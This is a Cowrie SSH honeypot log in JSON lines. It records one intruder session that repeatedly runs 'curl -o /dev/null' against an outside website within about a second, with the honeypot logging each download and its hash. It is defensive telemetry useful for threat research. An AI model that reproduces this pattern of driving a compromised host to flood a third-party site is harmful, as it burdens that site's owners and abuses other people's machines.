{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.804554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.842175Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.842842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.871542Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.883150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.883791Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.908267Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.923092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.923746Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.928742Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:33.965240Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.965973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.979638Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.989109Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:33.990934Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.005362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.006055Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.048483Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.049373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.086436Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.087161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.109680Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.134300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.135128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.171890Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.172638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.211293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.212178Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.249331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.250022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.286838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.287565Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.299691Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.325706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.326410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.350791Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.366722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.367480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.390801Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.404761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.405514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.418310Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.446250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.447082Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.484384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.485216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.491266Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.532825Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.533652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.557424Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.572634Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.573331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.612144Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.613041Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.618001Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.651491Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.652227Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.666965Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.689764Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.690569Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.717088Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.718745Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.727092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.727954Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.757907Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.765737Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.766435Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.828427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.829246Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.864773Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.866831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.867779Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.890924Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.906237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.906948Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.955348Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.956155Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.989483Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:34.993289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:34.993999Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.036586Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.037407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.051154Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.074578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.075436Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.114043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
